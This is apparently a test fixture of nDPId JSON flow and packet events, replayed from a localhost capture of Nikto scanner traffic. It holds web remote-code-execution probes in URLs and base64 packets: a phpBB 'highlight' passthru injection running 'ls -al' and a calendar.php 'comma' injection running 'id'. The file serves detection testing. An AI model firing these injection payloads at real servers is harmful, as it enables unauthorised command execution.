-01216{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":710,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":710,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277840,"flow_last_seen":1576420277840,"flow_idle_time":7440000,"flow_min_l4_payload_len":297,"flow_max_l4_payload_len":297,"flow_tot_l4_payload_len":297,"flow_avg_l4_payload_len":297,"midstream":1,"thread_ts_msec":1576420277840,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50982,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/postnuke\/html\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7440000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00868{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_packet_id":1,"flow_last_seen":1576420277841,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"thread_ts_msec":1576420277841,"pkt":"AAAAAAAAAAAAAAAACABFAAFXf1lAAEAGvEV\/AAABfwAAAccoH5A3NUZkeJaOS4AYAED\/SwAAAQEICp1m\/3mdZv95R0VUIC9tb2R1bGVzL3ZpZXd0b3BpYy5waHA\/dD0yJnJ1c2g9JTZjJTczJTIwJTJkJTYxJTZjJmhpZ2hsaWdodD0lMjUyNy4lNzAlNjElNzMlNzMlNzQlNjglNzIlNzUlMjglMjQlNDglNTQlNTQlNTAlNWYlNDclNDUlNTQlNWYlNTYlNDElNTIlNTMlNWIlNzIlNzUlNzMlNjglNWQlMjkuJTI1MjcgSFRUUC8xLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQpIb3N0OiAxMjcuMC4wLjENCg0K"} -01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":711,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":711,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277841,"flow_last_seen":1576420277841,"flow_idle_time":7440000,"flow_min_l4_payload_len":291,"flow_max_l4_payload_len":291,"flow_tot_l4_payload_len":291,"flow_avg_l4_payload_len":291,"midstream":1,"thread_ts_msec":1576420277841,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50984,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/modules\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00867{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_packet_id":1,"flow_last_seen":1576420277843,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":355,"pkt_l4_len":321,"thread_ts_msec":1576420277843,"pkt":"AAAAAAAAAAAAAAAACABFAAFV4EBAAEAGW2B\/AAABfwAAAccqH5AAS9kLhsuzOIAYAED\/SQAAAQEICp1m\/3udZv96R0VUIC9waHBCQi92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEzOTkpDQoNCg=="} -01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":712,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":712,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277843,"flow_last_seen":1576420277843,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277843,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50986,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/phpBB\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00868{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_packet_id":1,"flow_last_seen":1576420277844,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":355,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":355,"pkt_l4_len":321,"thread_ts_msec":1576420277844,"pkt":"AAAAAAAAAAAAAAAACABFAAFVVuFAAEAG5L9\/AAABfwAAAccsH5DRJG\/rOSfatoAYAED\/SQAAAQEICp1m\/3ydZv98R0VUIC9mb3J1bS92aWV3dG9waWMucGhwP3Q9MiZydXNoPSU2YyU3MyUyMCUyZCU2MSU2YyZoaWdobGlnaHQ9JTI1MjcuJTcwJTYxJTczJTczJTc0JTY4JTcyJTc1JTI4JTI0JTQ4JTU0JTU0JTUwJTVmJTQ3JTQ1JTU0JTVmJTU2JTQxJTUyJTUzJTViJTcyJTc1JTczJTY4JTVkJTI5LiUyNTI3IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMzk5KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} -01207{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":713,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":713,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277844,"flow_last_seen":1576420277844,"flow_idle_time":7440000,"flow_min_l4_payload_len":289,"flow_max_l4_payload_len":289,"flow_tot_l4_payload_len":289,"flow_avg_l4_payload_len":289,"midstream":1,"thread_ts_msec":1576420277844,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50988,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001399)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7440000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00892{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_packet_id":1,"flow_last_seen":1576420277845,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":374,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":374,"pkt_l4_len":340,"thread_ts_msec":1576420277845,"pkt":"AAAAAAAAAAAAAAAACABFAAFouhJAAEAGgXt\/AAABfwAAAccuH5A6xYMmaghNdoAYAED\/XAAAAQEICp1m\/32dZv99R0VUIC9pbmRleC5waHA\/bmFtZT1QTnBocEJCMiZmaWxlPXZpZXd0b3BpYyZ0PTImcnVzaD0lNmMlNzMlMjAlMmQlNjElNmMmaGlnaGxpZ2h0PSUyNTI3LiU3MCU2MSU3MyU3MyU3NCU2OCU3MiU3NSUyOCUyNCU0OCU1NCU1NCU1MCU1ZiU0NyU0NSU1NCU1ZiU1NiU0MSU1MiU1MyU1YiU3MiU3NSU3MyU2OCU1ZCUyOS4lMjUyNyBIVFRQLzEuMQ0KSG9zdDogMTI3LjAuMC4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxNDAwKQ0KDQo="} -01225{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":714,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":714,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277845,"flow_last_seen":1576420277845,"flow_idle_time":7440000,"flow_min_l4_payload_len":308,"flow_max_l4_payload_len":308,"flow_tot_l4_payload_len":308,"flow_avg_l4_payload_len":308,"midstream":1,"thread_ts_msec":1576420277845,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50990,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001400)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00675{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_packet_id":1,"flow_last_seen":1576420277847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":211,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":211,"pkt_l4_len":177,"thread_ts_msec":1576420277847,"pkt":"AAAAAAAAAAAAAAAACABFAADFXW9AAEAG3sF\/AAABfwAAAccwH5A6PWRZjzFeOIAYAED+uQAAAQEICp1m\/3+dZv9\/R0VUIC9tc2FkYy9tc2FkY3MuZGxsIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDE0NzQpDQoNCg=="} -01063{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":715,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":715,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277847,"flow_last_seen":1576420277847,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420277847,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50992,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/msadc\/msadcs.dll","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001474)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00666{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_packet_id":1,"flow_last_seen":1576420277849,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1576420277849,"pkt":"AAAAAAAAAAAAAAAACABFAADBYllAAEAG2dt\/AAABfwAAAccyH5AM9ltiiZJuH4AYAED+tQAAAQEICp1m\/4GdZv+AR0VUIC91cGxvYWRlci5waHAgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAxOCkNCg0K"} -01058{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":716,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":716,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277849,"flow_last_seen":1576420277849,"flow_idle_time":7440000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420277849,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50994,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/uploader.php","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003018)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7440000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00800{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_packet_id":1,"flow_last_seen":1576420277850,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":306,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":306,"pkt_l4_len":272,"thread_ts_msec":1576420277850,"pkt":"AAAAAAAAAAAAAAAACABFAAEkktVAAEAGqPx\/AAABfwAAAcc0H5D516vm6SxeZoAYAED\/GAAAAQEICp1m\/4KdZv+CR0VUIC9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCg0K"} -01157{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":717,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":717,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277850,"flow_last_seen":1576420277850,"flow_idle_time":7440000,"flow_min_l4_payload_len":240,"flow_max_l4_payload_len":240,"flow_tot_l4_payload_len":240,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1576420277850,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50996,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00809{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_packet_id":1,"flow_last_seen":1576420277851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":312,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":312,"pkt_l4_len":278,"thread_ts_msec":1576420277851,"pkt":"AAAAAAAAAAAAAAAACABFAAEqh81AAEAGs\/5\/AAABfwAAAcc2H5Bgvr79vMi8roAYAED\/HgAAAQEICp1m\/4OdZv+DR0VUIC9mb3J1bS9jYWxlbmRhci5waHA\/Y2FsYmlydGhkYXlzPTEmYWN0aW9uPWdldGRheSZkYXk9MjAwMS04LTE1JmNvbW1hPSUyMjtlY2hvJTIwJyc7JTIwZWNobyUyMCU2MGlkJTIwJTYwO2RpZSgpO2VjaG8lMjIgSFRUUC8xLjENCkhvc3Q6IDEyNy4wLjAuMQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KVXNlci1BZ2VudDogTW96aWxsYS81LjAwIChOaWt0by8yLjEuNikgKEV2YXNpb25zOk5vbmUpIChUZXN0OjAwMzAzOSkNCg0K"} -01164{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":718,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":718,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277851,"flow_last_seen":1576420277851,"flow_idle_time":7440000,"flow_min_l4_payload_len":246,"flow_max_l4_payload_len":246,"flow_tot_l4_payload_len":246,"flow_avg_l4_payload_len":246,"midstream":1,"thread_ts_msec":1576420277851,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50998,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forum\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00811{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_packet_id":1,"flow_last_seen":1576420277854,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":313,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":313,"pkt_l4_len":279,"thread_ts_msec":1576420277854,"pkt":"AAAAAAAAAAAAAAAACABFAAErhnRAAEAGtVZ\/AAABfwAAAcc4H5AJP79Gqf4KlIAYAED\/HwAAAQEICp1m\/4adZv+GR0VUIC9mb3J1bXMvY2FsZW5kYXIucGhwP2NhbGJpcnRoZGF5cz0xJmFjdGlvbj1nZXRkYXkmZGF5PTIwMDEtOC0xNSZjb21tYT0lMjI7ZWNobyUyMCcnOyUyMGVjaG8lMjAlNjBpZCUyMCU2MDtkaWUoKTtlY2hvJTIyIEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDMwMzkpDQoNCg=="} -01165{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":719,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":719,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277854,"flow_last_seen":1576420277854,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277854,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51000,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/forums\/calendar.php?calbirthdays=1&action=getday&day=2001-8-15&comma=%22;echo%20'';%20echo%20%60id%20%60;die();echo%22","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:003039)"}} -00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":720,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":720,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277855,"flow_last_seen":1576420277855,"flow_idle_time":7440000,"flow_min_l4_payload_len":247,"flow_max_l4_payload_len":247,"flow_tot_l4_payload_len":247,"flow_avg_l4_payload_len":247,"midstream":1,"thread_ts_msec":1576420277855,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":51002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 